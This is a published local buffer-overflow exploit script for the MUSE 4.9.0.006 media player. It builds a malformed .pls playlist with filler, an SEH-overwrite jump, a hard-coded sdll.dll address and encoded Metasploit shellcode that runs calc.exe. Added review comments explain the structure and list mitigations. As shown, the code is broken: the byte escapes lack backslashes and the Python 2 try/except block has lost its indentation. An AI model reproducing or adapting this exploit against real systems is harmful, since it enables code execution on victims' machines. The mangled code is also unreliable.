# Title : MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
# Published : 2010-08-16
# Author : Glafkos Charalambous
# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
# Date: August 17, 2010
# Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
# Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En
# Assembles, as one string, the contents of a deliberately malformed .pls
# playlist for MUSE 4.9.0.006.
# NOTE(review): as rendered on this page the literals contain no backslashes,
# so "x41" is three ordinary characters rather than one byte, and the
# multipliers below do not yield the byte counts they were written for. The
# escapes were presumably lost in extraction - check the original advisory.
# Defender view: the resulting file has no "[playlist]" section header and is
# one unbroken run of data well over a kilobyte long, which is a workable
# triage signature for playlist files handed to this player.
payload = "x41" * 1376
# Four-unit field placed directly after the filler, i.e. at the offset where,
# going by the "[SEH]" tag in the title, the exception-handler record sits.
payload += "xebx06x90x90"
# Hard-coded address inside the application's own sdll.dll. "Universal" only
# holds if that module loads at a fixed base and is not registered for SafeSEH
# (presumably the case here - confirm). Linking with /SAFESEH and /DYNAMICBASE
# and enabling SEHOP are the standard mitigations for this class of overwrite.
payload += "xAAx0cx02x10" # 10020CAA sdll.dll universal
payload += "x90" * 16
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
# Per the generator comment above, this blob only launches calc.exe, the
# customary proof that code execution was reached.
payload += ("xebx03x59xebx05xe8xf8xffxffxffx48x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax68"
"x58x30x41x31x50x42x41x6bx41x41x78x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x58x69x49x6cx49"
"x78x71x54x55x50x37x70x35x50x6cx4bx53x75x55x6cx6e"
"x6bx53x4cx74x45x62x58x56x61x4ax4fx4cx4bx30x4fx42"
"x38x6ex6bx73x6fx67x50x36x61x48x6bx70x49x6cx4bx66"
"x54x4ex6bx64x41x38x6ex74x71x49x50x7ax39x6ex4cx4e"
"x64x6bx70x52x54x44x47x4fx31x6bx7ax56x6dx46x61x5a"
"x62x5ax4bx78x74x67x4bx70x54x76x44x77x74x42x55x78"
"x65x6ex6bx53x6fx36x44x37x71x58x6bx30x66x4ex6bx44"
"x4cx62x6bx4ex6bx43x6fx57x6cx57x71x7ax4bx6cx4bx75"
"x4cx6ex6bx36x61x38x6bx6ex69x71x4cx44x64x75x54x79"
"x53x55x61x69x50x31x74x6ex6bx67x30x64x70x4fx75x59"
"x50x43x48x56x6cx6ex6bx41x50x76x6cx6cx4bx72x50x45"
"x4cx6cx6dx6ex6bx71x78x77x78x48x6bx66x69x4ex6bx6f"
"x70x4cx70x47x70x33x30x53x30x4cx4bx75x38x65x6cx43"
"x6fx76x51x78x76x75x30x50x56x4bx39x4bx48x6dx53x6f"
"x30x71x6bx76x30x35x38x78x70x4cx4ax75x54x63x6fx33"
"x58x4cx58x59x6ex6dx5ax34x4ex56x37x6bx4fx38x67x55"
"x33x45x31x30x6cx72x43x76x4ex53x55x53x48x70x65x37"
"x70x68")
# Trailing padding appended after the encoded blob.
payload += "x90" * 642
# Writes the assembled string to muse.pls in the current working directory and
# prints progress messages. The print statements use Python 2 syntax.
# NOTE(review): the indentation of the try/except bodies is missing on this
# page, so the block does not parse as shown.
try:
print "[+] Creating exploit file.."
# 'w' opens the file in text mode; the trailing semicolons are redundant.
exploit = open('muse.pls','w');
exploit.write(payload);
exploit.close();
print "[+] Writing", len(payload), "bytes to muse.pls"
print "[+] Exploit file created!"
# The bare except catches every error, not only permission failures, so the
# message below can misreport the cause; the handle also stays open if write()
# raises, because close() is not in a finally clause.
except:
print "[-] Error: You do not have correct permissions.."